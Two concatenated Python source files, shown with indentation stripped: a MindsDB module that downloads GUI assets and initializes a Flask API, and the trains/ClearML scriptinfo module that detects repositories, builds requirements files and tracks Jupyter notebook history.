from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import DatasourceController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
print(f'No connection: {e}')
return False
except Exception as e:
print(f'Something went wrong while getting compatible-config.json: {e}')
return False
if res.status_code != 200:
print(f"Can't get compatible-config.json: returned status code = {res.status_code}")
return False
try:
versions = res.json()
except Exception as e:
print(f"Can't decode compatible-config.json: {e}")
return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destignation, version):
if isinstance(destignation, str):
destignation = Path(destignation)
log = get_log('http')
css_zip_path = str(destignation.joinpath('css.zip'))
js_zip_path = str(destignation.joinpath('js.zip'))
media_zip_path = str(destignation.joinpath('media.zip'))
bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
resources = [{
'url': bucket + 'css-V' + version + '.zip',
'path': css_zip_path
}, {
'url': bucket + 'js-V' + version + '.zip',
'path': js_zip_path
}, {
'url': bucket + 'indexV' + version + '.html',
'path': str(destignation.joinpath('index.html'))
}, {
'url': bucket + 'favicon.ico',
'path': str(destignation.joinpath('favicon.ico'))
}, {
'url': bucket + 'media.zip',
'path': media_zip_path
}]
def get_resources(resource):
response = requests.get(resource['url'])
if response.status_code != requests.status_codes.codes.ok:
raise Exception(f"Error {response.status_code} GET {resource['url']}")
open(resource['path'], 'wb').write(response.content)
try:
for r in resources:
get_resources(r)
except Exception as e:
log.error(f'Error during downloading files from s3: {e}')
return False
for zip_path, dir_name in [[js_zip_path, 'js'], [css_zip_path, 'css']]:
temp_dir = destignation.joinpath(f'temp_{dir_name}')
temp_dir.mkdir(mode=0o777, exist_ok=True, parents=True)
ZipFile(zip_path).extractall(temp_dir)
files_path = destignation.joinpath('static', dir_name)
if temp_dir.joinpath('build', 'static', dir_name).is_dir():
shutil.move(temp_dir.joinpath('build', 'static', dir_name), files_path)
shutil.rmtree(temp_dir)
else:
shutil.move(temp_dir, files_path)
static_folder = Path(destignation).joinpath('static')
static_folder.mkdir(parents=True, exist_ok=True)
ZipFile(media_zip_path).extractall(static_folder)
os.remove(js_zip_path)
os.remove(css_zip_path)
os.remove(media_zip_path)
version_txt_path = destignation.joinpath('version.txt') # os.path.join(destignation, 'version.txt')
with open(version_txt_path, 'wt') as f:
f.write(version)
return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
''' Update Scout (GUI) files based on compatible-config.json content.
Files are downloaded and updated if the available GUI version is newer than the current one.
The current GUI version is stored in static/version.txt.
'''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???)
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
# NOTE: rewrite this; it is a hotfix to show the GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_datasource_interface = DatasourceController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
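# --- Illustrative sketch (added, not part of the MindsDB module) ---
# get_last_compatible_gui_version() maps each mindsdb version to the newest GUI
# version declared for it. A toy reproduction of that selection step, using a
# hypothetical compatible-config.json payload:
if __name__ == "__main__":
    _entries = [
        {'mindsdb_version': '2.55.0', 'gui_version': '1.10.0'},
        {'mindsdb_version': '2.55.0', 'gui_version': '1.12.0'},
        {'mindsdb_version': '2.60.0', 'gui_version': '1.14.0'},
    ]
    _gui_versions = {}
    for _el in _entries:
        _m, _g = LooseVersion(_el['mindsdb_version']), LooseVersion(_el['gui_version'])
        if _m.vstring not in _gui_versions or _g > _gui_versions[_m.vstring]:
            _gui_versions[_m.vstring] = _g
    print({k: v.vstring for k, v in _gui_versions.items()})  # {'2.55.0': '1.12.0', '2.60.0': '1.14.0'}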
|
scriptinfo.py
|
import os
import sys
from copy import copy
from functools import partial
from tempfile import mkstemp
import attr
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'trains', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except Exception:
conda_requirements = ''
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
except Exception:
forced_packages = {}
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
else:
requirements_txt += '{0}\n'.format(k)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
if forced_packages[k]:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', forced_packages[k])
else:
requirements_txt += '{0}\n'.format(k)
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always a forward slash, because this comes from a URI (never a backslash, not even on Windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepaths, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
scripts_path = [Path(os.path.normpath(f)).absolute() for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
if not plugin:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(str(d), include_diff=check_uncommitted)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']:
argvs = ''
git_root = os.path.abspath(script_dict['repo_root']) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(a_abs, os.path.join(git_root, script_dict['working_dir']))
argvs += ' {}'.format(a)
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(
vars(sys.modules['__main__'])['__package__'], (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception as ex:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are still in cell execution, otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
